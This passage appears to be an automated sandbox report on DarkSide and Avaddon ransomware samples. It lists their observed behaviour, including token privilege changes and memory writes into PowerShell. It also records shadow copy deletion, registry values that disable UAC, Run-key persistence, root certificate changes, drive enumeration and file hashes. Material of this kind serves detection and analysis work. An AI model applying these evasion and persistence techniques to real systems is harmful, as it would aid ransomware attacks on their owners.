N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 34	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 3068 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 580	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/3068-0-0x0000000000C40000-0x0000000000C50000-memory.dmp

memory/580-5-0x000007FEF56FE000-0x000007FEF56FF000-memory.dmp

memory/580-6-0x000000001B680000-0x000000001B962000-memory.dmp

memory/580-7-0x0000000002340000-0x0000000002348000-memory.dmp

memory/580-8-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/580-9-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/580-11-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/580-10-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

memory/3068-12-0x0000000000C40000-0x0000000000C50000-memory.dmp

memory/580-13-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

C:\Users\README.e528f7ef.TXT

MD5	25d0b19a0ec34a39dfa3e177866f01a3
SHA1	a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256	f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512	ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

memory/3068-23-0x0000000000C40000-0x0000000000C50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5	39ca3a64d512eb6223252000fce5e706
SHA1	b6a218024c140101e0f25026795107e803756cc6
SHA256	208eac0667def9a016803ce9dfaf8c948324045a2570073d7a847608e538264c
SHA512	68700aa3c74cfc01af8f7e6a019653c2b5ae2ca778e76ef806d1d643ae46c01113cf20abe43e81d205e086a4844594578fd114fc118b711616425c9e95014c31

memory/3068-211-0x0000000000C40000-0x0000000000C50000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:40

Platform

win7-20240708-en

Max time kernel

65s

Max time network

72s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (279) files with added filename extension

ransomware

Adds Run key to start application

persistence

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Checks whether UAC is enabled

evasion trojan

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	\??\Z:\$RECYCLE.BIN\S-1-5-21-940600906-3464502421-4240639183-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\A:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\G:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\L:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\M:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\Q:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\F:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\I:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\O:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\R:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\S:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\U:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\W:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\E:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\K:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\P:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\T:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\V:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\X:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\Z:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\B:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\H:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\J:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\N:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
File opened (read-only)	\??\Y:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Looks up external IP address via web service

Description	Indicator	Process	Target
N/A	api.myip.com	N/A	N/A
N/A	api.myip.com	N/A	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\vssadmin.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\vssadmin.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\vssadmin.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\vssadmin.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\vssadmin.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\vssadmin.exe	N/A

Modifies Internet Explorer settings

adware spyware

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\GPU	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Zoom	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{09CDD5B1-4D00-11EF-B586-DECC44E0FF92} = "0"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d09f86df0ce1da01	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\SearchScopes	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003e1c4d4a7885794291b78de8e6dfadfd0000000002000000000010660000000100002000000069cf345540284eb67367bc29b5fb7d0255e038194c75dc3183c854c261c6e0cd000000000e80000000020000200000009e43a9511c3ba4df713634e8936653f56e389f6e02fe2c162715539fca613273900000006a7b1bcf8d582149716a463d64f0eef3be5edf6aaaf72d26de720a110d2f743dddcaa93132f45435706b853a9db74e60f4ef8869810850c275fb2f94771456a2619dc68f670a63cc0a20d95ce779f7e3931facfec74d042118b2581c70714fbd68e416b3bfddb160608471994ccc67fda646292c851873b371b688bdbd448a7b7f443e95ca96979565dd24966cd1c56740000000778552893e04625c10fbf34d9f88a25dada6dcf24dd9b50dbd1a66c52839f44edcbeab162a1f4bf8cc01207f6ab210317a3c56786fe63b8ec2405bc34a0e4422	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\IntelliForms	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003e1c4d4a7885794291b78de8e6dfadfd000000000200000000001066000000010000200000005bea3f150a57aa271f0a1119da73c1f3428925132e16624de0f98204ae8747a5000000000e8000000002000020000000c304fbccabc967f57966edffcad2b565ecf683d147601626fd5b27a6da23f70420000000e59820f974b56626c6ec9aee92fef11badc5630b2b04beae3ec77eafaa6df3df400000003b8e14ba30eb0211c28b4cc6f988c8d13cc583644700d7f0d46d82aa055bfeba37b90818b61aec595c78a28e44bae8f6833fb9c8f95c55a3eb0d9ec53ee83004	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Toolbar	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\PageSetup	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\InternetRegistry	C:\Program Files\Internet Explorer\iexplore.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	C:\Program Files\Internet Explorer\iexplore.exe	N/A

Modifies system certificate store

evasion spyware trojan

Description	Indicator	Process	Target
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
